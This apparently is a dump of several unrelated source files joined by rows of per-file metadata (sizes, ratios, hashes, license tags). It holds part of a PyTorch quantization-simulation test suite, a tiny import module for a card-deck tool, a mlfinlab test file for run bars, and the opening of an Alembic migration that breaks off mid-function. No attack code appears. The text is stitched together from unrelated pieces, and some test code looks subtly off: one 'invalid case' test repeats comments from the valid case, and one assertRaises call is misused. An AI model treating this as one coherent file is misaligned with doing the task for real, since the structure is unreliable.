dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
default_data_type=QuantizationDataType.int, default_output_bw=4, default_param_bw=4)
sim.compute_encodings(forward_fn, forward_pass_callback_args=None)
# enforce is set to true
# default supported kernels at index DEFAULT_OVERRIDE_SUPPORTED_KERNEL_INDEX (=0 in this case)
# is not same as default quantsim bw and dtype(int 4/int4), apply default overrides (int8/ int8).
assert(sim.model.fc.param_quantizers['weight'].enabled)
assert(sim.model.fc.param_quantizers['bias'].enabled == False)
assert(sim.model.fc.param_quantizers['weight'].bitwidth == 8)
assert(sim.model.fc.param_quantizers['weight'].data_type == QuantizationDataType.int)
assert(sim.model.fc.param_quantizers['bias'].bitwidth == 8)
assert(sim.model.fc.param_quantizers['bias'].data_type == QuantizationDataType.int)
assert(sim.model.fc.output_quantizers[0].bitwidth == 8)
assert(sim.model.fc.output_quantizers[0].data_type == QuantizationDataType.int)
assert(sim.model.relu1.output_quantizers[0].bitwidth == 8)
assert(sim.model.relu1.output_quantizers[0].data_type == QuantizationDataType.int)
# at op level (for Conv) check param quantizers are updated to fp16 while output is still retained at int8
assert(sim.model.conv1.param_quantizers['weight'].enabled == True)
assert(sim.model.conv1.param_quantizers['weight'].bitwidth == 16)
assert(sim.model.conv1.param_quantizers['weight'].data_type == QuantizationDataType.float)
assert(sim.model.conv1.output_quantizers[0].bitwidth == 8)
assert(sim.model.conv1.output_quantizers[0].data_type == QuantizationDataType.int)
# remove test config created
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_target_rule_enforced_apply_default_and_op_level_overrides_invalid_case(self):
"""
Tests application of override config rule that is not valid.
:return:
"""
model = SingleResidual()
model.eval()
# quantsim config has default kernel overrides as well as op lebel kernel override
# we begin with quantsim default config (int 4, int 4), during isntantiation of quantsim object.
# Then, using config file we apply two levels of overrides.
# 1) default supported_kernels at index 0 , is used to override default act/param bw dtype with int8 / int8
# 2) After this, at op level, specifically for Conv types, there is a override provided as fp16/ fp16
# So, param quantizers of conv shall be updated to FP16 as a override, while retaining output at int 8 as
# configured by default level supported_kernels.
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
},
"supported_kernels": [
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
{
"activation": {
"bitwidth": 4,
"dtype": "int"
},
"param": {
"bitwidth": 4,
"dtype": "int"
}
}
]
},
"params": {
"bias": {
"is_quantized": "False"
}
},
"op_type": {
"Conv": {
"is_input_quantized": "True",
"is_output_quantized": "True",
"params": {
"weight": {
"is_quantized": "True"
},
"bias": {
"is_quantized": "False"
}
},
"supported_kernels":
[
{
"activation": {
"bitwidth": 8,
"dtype": "int"
},
"param": {
"bitwidth": 8,
"dtype": "int"
}
},
]
}
},
"supergroups": [
],
"model_input": {
"is_input_quantized": "True"
},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
INPUT_SHAPE = (1, 3, 32, 32)
def forward_fn(model, _):
torch.manual_seed(10)
model.eval()
with torch.no_grad():
_ = model(torch.randn(INPUT_SHAPE))
# set enforce to true for this test
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
# enforce is set to true
# default supported kernels at index DEFAULT_OVERRIDE_SUPPORTED_KERNEL_INDEX (=0 in this case)
# is not same as default quantsim bw and dtype(int4/int4), apply default overrides (fp16/ fp16).
# so, default qsim is created with fp16/fp16 as per default level supported_kernel at override index/
# But, op level has a kernel that is lower precision (int 8,int8) as compared to this.
# so, rule checker should flag and cause exception in this case.
exception_raised = False
try:
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf_enhanced,
config_file='./data/quantsim_config.json',
dummy_input=torch.rand(1, 3, 32, 32), in_place=True,
default_data_type=QuantizationDataType.int, default_output_bw=4, default_param_bw=4)
except NotImplementedError as exc:
exception_raised = True
print(" Test raised exception as expected ", exc)
assert exception_raised
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
def test_target_rule_enforced_apply_op_level_overrides_fp16(self):
"""
validates Config overrides provided are valid combination and application of aic100 specific rules.
No dfeualt supported kernel override and op level FP16 support for LayerNorm and GeLU.
Quantsim created with (int8, int8) defaults
a) Default supported kernels override not provided.
b) op level override at index 0 of supported_kernels for LayerNorm/GeLU type is
(fp 16, fp16) --> applied to params.
For GeLu, nothing is applied, as it has not params. output is retained at int 8.
:return:
"""
# aic100, no default supported kernels, op level for layernorm and gelu
quantsim_config = {
"defaults": {
"ops": {
"is_output_quantized": "True"
},
"params": {
"is_quantized": "True"
}
},
"params": {},
"op_type": {
"LayerNorm": {
"supported_kernels":
[
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
]
},
"GELU": {
"is_output_quantized": "True",
"supported_kernels":
[
{
"activation": {
"bitwidth": 16,
"dtype": "float"
},
"param": {
"bitwidth": 16,
"dtype": "float"
}
},
]
}
},
"supergroups": [],
"model_input": {},
"model_output": {}
}
with open('./data/quantsim_config.json', 'w') as f:
json.dump(quantsim_config, f)
torch.manual_seed(10)
model = ModelWithBertCustomLayerNormGelu()
model.eval()
random_input = torch.rand(1, 4, 4)
def forward_pass(model, args):
model.eval()
with torch.no_grad():
model(*random_input)
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = True
sim = QuantizationSimModel(model, quant_scheme=QuantScheme.post_training_tf,
dummy_input=random_input, default_data_type=QuantizationDataType.int,
default_output_bw=8, default_param_bw=8,
config_file='./data/quantsim_config.json')
# enforce is set to true
# LayerNorm params should be set to FP 16, while output is maintained at quantsim defaults (int8)
assert(sim.model.customln1.output_quantizer.data_type == QuantizationDataType.int)
assert(sim.model.customln1.output_quantizer.bitwidth == 8)
# override this with custom config (matches aic100_config.json)
assert(sim.model.customln1.param_quantizers['weight'].data_type == QuantizationDataType.float)
assert(sim.model.customln1.param_quantizers['weight'].bitwidth == 16)
# gelu output should be retained at quantsim defaults (int8) although it has supported_kernels = FP16
# as this op doesn't have params
assert(sim.model.gelu1.output_quantizer.data_type == QuantizationDataType.int)
assert(sim.model.gelu1.output_quantizer.bitwidth == 8)
# remove test config created
qsim_config.ENFORCE_TARGET_DTYPE_BITWIDTH_CONFIG = False
if os.path.exists('./data/quantsim_config.json'):
os.remove('./data/quantsim_config.json')
| 40.939926
| 136
| 0.482327
| 6,745
| 77,008
| 5.299629
| 0.066271
| 0.059923
| 0.042802
| 0.052314
| 0.866251
| 0.850305
| 0.828848
| 0.816791
| 0.809126
| 0.801069
| 0
| 0.013798
| 0.423073
| 77,008
| 1,880
| 137
| 40.961702
| 0.790785
| 0.137466
| 0
| 0.70915
| 0
| 0
| 0.131534
| 0.03532
| 0
| 0
| 0
| 0
| 0.098039
| 1
| 0.024183
| false
| 0.004575
| 0.013725
| 0
| 0.041176
| 0.001961
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
826c267c6f0e4c8fb3a779811a655bcb0a0e3dfb
| 218
|
py
|
Python
|
main.py
|
TiesWestendorp/MTG-Deck-Organizer
|
409185c1bcfc8bf70c441d3242ed10c7c41f9d90
|
[
"MIT"
] | null | null | null |
main.py
|
TiesWestendorp/MTG-Deck-Organizer
|
409185c1bcfc8bf70c441d3242ed10c7c41f9d90
|
[
"MIT"
] | null | null | null |
main.py
|
TiesWestendorp/MTG-Deck-Organizer
|
409185c1bcfc8bf70c441d3242ed10c7c41f9d90
|
[
"MIT"
] | null | null | null |
from commands import cards_not_in_decks
from commands import disjoint_bases
from commands import inventory_sum_decklists
from commands import inventory_union_decklists
from commands import simultaneously_constructible
| 36.333333
| 49
| 0.908257
| 29
| 218
| 6.517241
| 0.517241
| 0.31746
| 0.47619
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091743
| 218
| 5
| 50
| 43.6
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
827f78838e906c745628bfceb8e5c660408759b9
| 22,808
|
py
|
Python
|
mlfinlab/tests/test_run_data_structures.py
|
scibol/mlfinlab
|
3c80f269bc68b8cb9bcf863ceb3dc77fc14b6984
|
[
"BSD-3-Clause"
] | 8
|
2020-04-19T08:09:34.000Z
|
2022-03-30T20:49:40.000Z
|
mlfinlab/tests/test_run_data_structures.py
|
scibol/mlfinlab
|
3c80f269bc68b8cb9bcf863ceb3dc77fc14b6984
|
[
"BSD-3-Clause"
] | 1
|
2019-07-24T17:52:30.000Z
|
2019-07-24T17:52:30.000Z
|
mlfinlab/tests/test_run_data_structures.py
|
scibol/mlfinlab
|
3c80f269bc68b8cb9bcf863ceb3dc77fc14b6984
|
[
"BSD-3-Clause"
] | 8
|
2020-08-09T02:25:04.000Z
|
2022-03-20T15:08:11.000Z
|
"""
Tests the financial data structures
"""
import unittest
import os
import numpy as np
import pandas as pd
from mlfinlab.data_structures import run_data_structures as ds
class TestDataStructures(unittest.TestCase):
"""
Test the various financial data structures:
1. Run Dollar bars
2. Run Volume bars
3. Run Tick bars
"""
def setUp(self):
"""
Set the file path for the tick data csv
"""
project_path = os.path.dirname(__file__)
self.path = project_path + '/test_data/imbalance_sample_data.csv'
def test_ema_run_dollar_bars(self):
"""
Tests the EMA run dollar bars implementation.
"""
exp_num_ticks_init = 1000
num_prev_bars = 3
db1, thresh_1 = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
analyse_thresholds=True)
db2, thresh_2 = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
analyse_thresholds=True)
db3, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
to_csv=True, output_path='test.csv')
db4 = pd.read_csv('test.csv', parse_dates=[0])
self.assertEqual(db1.shape, (3, 10))
# Assert diff batch sizes have same number of bars
self.assertTrue(db1.shape == db2.shape)
self.assertTrue(db1.shape == db3.shape)
self.assertTrue(db1.shape == db4.shape)
# Assert same values
self.assertTrue(np.all(db1.values == db2.values))
self.assertTrue(np.all(db1.values == db3.values))
self.assertTrue(np.all(db1.values == db4.values))
self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[0, 'open'], 1306.0)
self.assertEqual(db1.loc[0, 'high'], 1306.0)
self.assertEqual(db1.loc[0, 'low'], 1303.00)
self.assertEqual(db1.loc[0, 'close'], 1305.75)
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[2, 'open'], 1307.25)
self.assertEqual(db1.loc[2, 'high'], 1307.25)
self.assertEqual(db1.loc[2, 'low'], 1302.25)
self.assertEqual(db1.loc[2, 'close'], 1302.25)
self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
# Delete generated csv file (if it wasn't generated test would fail)
os.remove('test.csv')
def test_ema_run_volume_bars(self):
"""
Tests the EMA run volume bars implementation.
"""
exp_num_ticks_init = 1000
num_prev_bars = 3
db1, thresh_1 = ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
analyse_thresholds=True)
db2, thresh_2 = ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
analyse_thresholds=True)
db3, _ = ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
ds.get_ema_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
to_csv=True, output_path='test.csv')
db4 = pd.read_csv('test.csv', parse_dates=[0])
self.assertEqual(db1.shape, (3, 10))
# Assert diff batch sizes have same number of bars
self.assertTrue(db1.shape == db2.shape)
self.assertTrue(db1.shape == db3.shape)
self.assertTrue(db1.shape == db4.shape)
# Assert same values
self.assertTrue(np.all(db1.values == db2.values))
self.assertTrue(np.all(db1.values == db3.values))
self.assertTrue(np.all(db1.values == db4.values))
self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[0, 'open'], 1306.0)
self.assertEqual(db1.loc[0, 'high'], 1306.0)
self.assertEqual(db1.loc[0, 'low'], 1303.00)
self.assertEqual(db1.loc[0, 'close'], 1305.75)
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[2, 'open'], 1307.25)
self.assertEqual(db1.loc[2, 'high'], 1307.25)
self.assertEqual(db1.loc[2, 'low'], 1302.25)
self.assertEqual(db1.loc[2, 'close'], 1302.25)
self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
# Delete generated csv file (if it wasn't generated test would fail)
os.remove('test.csv')
def test_ema_run_tick_bars(self):
"""
Tests the EMA run tick bars implementation.
"""
exp_num_ticks_init = 1000
num_prev_bars = 3
db1, thresh_1 = ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
analyse_thresholds=True)
db2, thresh_2 = ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
analyse_thresholds=True)
db3, _ = ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
ds.get_ema_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
to_csv=True, output_path='test.csv')
db4 = pd.read_csv('test.csv', parse_dates=[0])
self.assertEqual(db1.shape, (4, 10))
# Assert diff batch sizes have same number of bars
self.assertTrue(db1.shape == db2.shape)
self.assertTrue(db1.shape == db3.shape)
self.assertTrue(db1.shape == db4.shape)
# Assert same values
self.assertTrue(np.all(db1.values == db2.values))
self.assertTrue(np.all(db1.values == db3.values))
self.assertTrue(np.all(db1.values == db4.values))
self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[0, 'open'], 1306.0)
self.assertEqual(db1.loc[0, 'high'], 1306.0)
self.assertEqual(db1.loc[0, 'low'], 1303.00)
self.assertEqual(db1.loc[0, 'close'], 1305.75)
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[2, 'open'], 1307.25)
self.assertEqual(db1.loc[2, 'high'], 1307.75)
self.assertEqual(db1.loc[2, 'low'], 1303.5)
self.assertEqual(db1.loc[2, 'close'], 1304.5)
self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
# Delete generated csv file (if it wasn't generated test would fail)
os.remove('test.csv')
def test_ema_run_dollar_bars_with_constraints(self):
"""
Test the EMA Dollar Run bars with expected number of ticks max and min constraints
"""
exp_num_ticks_init = 1000
num_prev_bars = 3
exp_num_ticks_constraints = [100, 1000]
db1, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
exp_num_ticks_constraints=exp_num_ticks_constraints,
num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False)
db2, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
exp_num_ticks_constraints=exp_num_ticks_constraints,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False)
db3, _ = ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
exp_num_ticks_constraints=exp_num_ticks_constraints,
num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
ds.get_ema_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
exp_num_ticks_constraints=exp_num_ticks_constraints,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
to_csv=True, output_path='test.csv')
db4 = pd.read_csv('test.csv', parse_dates=[0])
self.assertEqual(db1.shape, (9, 10))
# Assert diff batch sizes have same number of bars
self.assertTrue(db1.shape == db2.shape)
self.assertTrue(db1.shape == db3.shape)
self.assertTrue(db1.shape == db4.shape)
# Assert same values
self.assertTrue(np.all(db1.values == db2.values))
self.assertTrue(np.all(db1.values == db3.values))
self.assertTrue(np.all(db1.values == db4.values))
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[0, 'open'], 1306.0)
self.assertEqual(db1.loc[0, 'high'], 1306.0)
self.assertEqual(db1.loc[0, 'low'], 1303.0)
self.assertEqual(db1.loc[0, 'close'], 1305.75)
self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
# Assert OHLC is correct (some index)
self.assertEqual(db1.loc[7, 'open'], 1302.5)
self.assertEqual(db1.loc[7, 'high'], 1304.75)
self.assertEqual(db1.loc[7, 'low'], 1301.75)
self.assertEqual(db1.loc[7, 'close'], 1304.5)
self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
# Delete generated csv file (if it wasn't generated test would fail)
os.remove('test.csv')
def test_const_run_dollar_bars(self):
"""
Tests the Const run dollar bars implementation.
"""
exp_num_ticks_init = 1000
num_prev_bars = 3
db1, thresh_1 = ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
analyse_thresholds=True)
db2, thresh_2 = ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
analyse_thresholds=True)
db3, _ = ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
ds.get_const_dollar_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
to_csv=True, output_path='test.csv')
db4 = pd.read_csv('test.csv', parse_dates=[0])
self.assertEqual(db1.shape, (9, 10))
# Assert diff batch sizes have same number of bars
self.assertTrue(db1.shape == db2.shape)
self.assertTrue(db1.shape == db3.shape)
self.assertTrue(db1.shape == db4.shape)
# Assert same values
self.assertTrue(np.all(db1.values == db2.values))
self.assertTrue(np.all(db1.values == db3.values))
self.assertTrue(np.all(db1.values == db4.values))
self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[0, 'open'], 1306.0)
self.assertEqual(db1.loc[0, 'high'], 1306.0)
self.assertEqual(db1.loc[0, 'low'], 1303.00)
self.assertEqual(db1.loc[0, 'close'], 1305.75)
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[2, 'open'], 1306.0)
self.assertEqual(db1.loc[2, 'high'], 1307.75)
self.assertEqual(db1.loc[2, 'low'], 1305.75)
self.assertEqual(db1.loc[2, 'close'], 1307.75)
self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
# Delete generated csv file (if it wasn't generated test would fail)
os.remove('test.csv')
def test_const_run_volume_bars(self):
"""
Tests the Const run volume bars implementation.
"""
exp_num_ticks_init = 1000
num_prev_bars = 3
db1, thresh_1 = ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
analyse_thresholds=True)
db2, thresh_2 = ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
analyse_thresholds=True)
db3, _ = ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
ds.get_const_volume_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
to_csv=True, output_path='test.csv')
db4 = pd.read_csv('test.csv', parse_dates=[0])
self.assertEqual(db1.shape, (9, 10))
# Assert diff batch sizes have same number of bars
self.assertTrue(db1.shape == db2.shape)
self.assertTrue(db1.shape == db3.shape)
self.assertTrue(db1.shape == db4.shape)
# Assert same values
self.assertTrue(np.all(db1.values == db2.values))
self.assertTrue(np.all(db1.values == db3.values))
self.assertTrue(np.all(db1.values == db4.values))
self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[0, 'open'], 1306.0)
self.assertEqual(db1.loc[0, 'high'], 1306.0)
self.assertEqual(db1.loc[0, 'low'], 1303.00)
self.assertEqual(db1.loc[0, 'close'], 1305.75)
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[2, 'open'], 1306.0)
self.assertEqual(db1.loc[2, 'high'], 1307.75)
self.assertEqual(db1.loc[2, 'low'], 1305.75)
self.assertEqual(db1.loc[2, 'close'], 1307.75)
self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
# Delete generated csv file (if it wasn't generated test would fail)
os.remove('test.csv')
def test_const_run_tick_bars(self):
"""
Tests the Const run dollar bars implementation.
"""
exp_num_ticks_init = 1000
num_prev_bars = 3
db1, thresh_1 = ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
analyse_thresholds=True)
db2, thresh_2 = ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
analyse_thresholds=True)
db3, _ = ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
expected_imbalance_window=10000,
num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
to_csv=True, output_path='test.csv')
db4 = pd.read_csv('test.csv', parse_dates=[0])
self.assertEqual(db1.shape, (9, 10))
# Assert diff batch sizes have same number of bars
self.assertTrue(db1.shape == db2.shape)
self.assertTrue(db1.shape == db3.shape)
self.assertTrue(db1.shape == db4.shape)
# Assert same values
self.assertTrue(np.all(db1.values == db2.values))
self.assertTrue(np.all(db1.values == db3.values))
self.assertTrue(np.all(db1.values == db4.values))
self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[0, 'open'], 1306.0)
self.assertEqual(db1.loc[0, 'high'], 1306.0)
self.assertEqual(db1.loc[0, 'low'], 1303.00)
self.assertEqual(db1.loc[0, 'close'], 1305.75)
# Assert OHLC is correct (the first value)
self.assertEqual(db1.loc[2, 'open'], 1306.0)
self.assertEqual(db1.loc[2, 'high'], 1307.5)
self.assertEqual(db1.loc[2, 'low'], 1305.75)
self.assertEqual(db1.loc[2, 'close'], 1307.5)
self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
# Delete generated csv file (if it wasn't generated test would fail)
os.remove('test.csv')
def test_csv_format(self):
"""
Asserts that the csv data being passed is of the correct format.
"""
wrong_date = ['2019-41-30', 200.00, np.int64(5)]
wrong_price = ['2019-01-30', 'asd', np.int64(5)]
wrong_volume = ['2019-01-30', 200.00, '1.5']
too_many_cols = ['2019-01-30', 200.00,
np.int64(5), 'Limit order', 'B23']
# pylint: disable=protected-access
self.assertRaises(ValueError, ds.BaseRunBars._assert_csv(
pd.DataFrame(wrong_date).T))
# pylint: disable=protected-access
self.assertRaises(AssertionError,
ds.BaseRunBars._assert_csv,
pd.DataFrame(too_many_cols).T)
# pylint: disable=protected-access
self.assertRaises(AssertionError,
ds.BaseRunBars._assert_csv,
pd.DataFrame(wrong_price).T)
# pylint: disable=protected-access
self.assertRaises(AssertionError,
ds.BaseRunBars._assert_csv,
pd.DataFrame(wrong_volume).T)
| 50.348786
| 112
| 0.573439
| 2,856
| 22,808
| 4.317927
| 0.056723
| 0.040869
| 0.064223
| 0.07663
| 0.940399
| 0.935209
| 0.914937
| 0.907395
| 0.904882
| 0.902368
| 0
| 0.060224
| 0.318572
| 22,808
| 452
| 113
| 50.460177
| 0.733239
| 0.098606
| 0
| 0.786667
| 0
| 0
| 0.033384
| 0.001775
| 0
| 0
| 0
| 0
| 0.46
| 1
| 0.03
| false
| 0
| 0.016667
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7d6cd140c30864ce1cdf005b63ddcbbd8e689f66
| 4,727
|
py
|
Python
|
dataactcore/migrations/versions/2ae156c8f46d_update_d1_and_d2_for_daims_v1_1.py
|
brianherman/data-act-broker-backend
|
80eb055b9d245046192f7ad4fd0be7d0e11d2dec
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
dataactcore/migrations/versions/2ae156c8f46d_update_d1_and_d2_for_daims_v1_1.py
|
brianherman/data-act-broker-backend
|
80eb055b9d245046192f7ad4fd0be7d0e11d2dec
|
[
"CC0-1.0"
] | 3
|
2021-08-22T11:47:45.000Z
|
2022-03-29T22:06:49.000Z
|
dataactcore/migrations/versions/2ae156c8f46d_update_d1_and_d2_for_daims_v1_1.py
|
brianherman/data-act-broker-backend
|
80eb055b9d245046192f7ad4fd0be7d0e11d2dec
|
[
"CC0-1.0"
] | 1
|
2020-07-17T23:50:56.000Z
|
2020-07-17T23:50:56.000Z
|
"""update d1 and d2 for daims v1.1
Revision ID: 2ae156c8f46d
Revises: 4b1ee78268fb
Create Date: 2017-08-28 15:16:00.926683
"""
# revision identifiers, used by Alembic.
revision = '2ae156c8f46d'
down_revision = '4b1ee78268fb'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_data_broker():
### commands auto generated by Alembic - please adjust! ###
op.add_column('award_procurement', sa.Column('award_or_idv_flag', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('place_of_perform_county_na', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('place_of_perform_state_nam', sa.Text(), nullable=True))
